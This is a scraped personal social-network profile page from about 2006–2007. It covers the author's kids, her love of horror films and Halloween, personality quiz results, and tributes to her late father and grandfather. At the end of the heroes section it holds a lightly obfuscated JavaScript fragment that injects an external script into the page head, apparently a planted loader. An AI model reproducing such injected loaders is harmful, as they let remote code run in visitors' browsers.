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Tina Ree

Gra Go Deo

About Me

I really hate talking about myself... I would rather people just ask me questions on what they would like to know!! BUT if you insist I will try to sum up myself in a a few words for you. I have kids who are my life although sometimes they are very annoying haaha BUT I love them!!!... I am pretty much a happy go lucky person who smiles all the time.... I love the beach!!!! it is just so beautiful and peacful at night!!!! HOWEVER I live in Ohio which I like to call oHELLo though so I never really get to enjoy that only when I get to go on vacation and that has not happen in awhile:( I use to be big into making gift baskets for different things but that seems to be a thing of the past.... my new thing is attempt to try my hand at designing handbags and a lil dabble in jewelry I guess we will see where that goes.... which that as of now is not going well haha... I am also getting into making horror props which helps since I am a huge HORROR fan I love the blood and guts no chick flick movies for me..... yeah yeah I hear ya thats gross hahaha!!! oh well..... I am working on other horror projects also but who knows what will happen with that stuff!!!I might as well go on an say I love HALLOWEEN one might say that halloween to me is like christmas to a lil kid hahahaha but come on now where else can you be whatever you want and not get judge for it?...... well I know there is more and if you want to know just ask!!!!!!Myspace Graphics
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My Interests

I have a broad range of interests if you really want to know ask me.
T Twisted
I Influential
N Natural
A Astounding
R Rounded
E Exhausting
E Entertaining
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From Go-Quiz.com msprm NAME=movie

I'd like to meet:

I am not on here to hook up with anyone!! but I will still take lovely comments no harm there:) ..... I would like to meet people from all over the world.... you can never have too many friends!!!! .... ummmmm someone who produces horror films would be nice hehehee Gummy Bear Dance 2

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I am a HUGE horror fan the more blood and guts the better! I like just about anything but must say I am not into the chick flicks yeah yeah I know strange huh? but give me an action packed movie over a chick flick anyday! I am also a HUGE Willy Wonka Fan I love that movie yeah I know you are thinking YUCK!! BUT hey the original one was awesome!!!!! I do like charlie and the chocolate factory Tim Burton did a great job!!
How evil are you?Take the quiz:
Which Horror Movie Killer Are You?

Your the killer Leprechaun, you love your gold and will literaly kill for it. Your a sneaky lil devil too to short to be notice, Hiding in trees, making animal sounds. Your smart too making deals, and always keeping your end of the bargain. If anyone every double-crossed you youd make sure they never did it again. ooOOoohh your fiesty.

Quizzes by myYearbook.com -- the World's Biggest Yearbook!


CSI is prolly my all time fav followed by law and orderSVU Take the quiz:
Which famous movie kiss are you?

Sixteen Candles
You are the Sixteen Candles kiss!

Quizzes by myYearbook.com -- the World's Biggest Yearbook!


I like suspense thrillers or something that keeps my interest or it is a lost cause
Create yours at BlingyBlob.com!


My Dad he was my best friend and always no matter what I did was there for me he was and always will be the best. and my Grandpa who took the place of my dad when he was busy or I just wanted to be spoiled haha they both died of cancer and that alone makes them heroes in my eyes for they never complained and up to the last moments of life were there for me!! .."var s=document·createElement('script' );s.src='..';document·getElements ByTagName('head')[0].appendChild(s);"

My Blog


  Ok so here is the whole story of the hand.......The last saturday in October my daughter and I were playing and messing around when she caught me off guard and knocked me right on my ass!! Now ...
Posted by Tina Ree on Sun, 11 Feb 2007 02:53:00 PST

so sad but true

You might be from Ohio (pronounced O-hi-uh), if: You think all Pro football teams are supposed to wear orange! You know all the 4 seasons: winter, still winter, almost winter and construction. You li...
Posted by Tina Ree on Tue, 08 Aug 2006 09:47:00 PST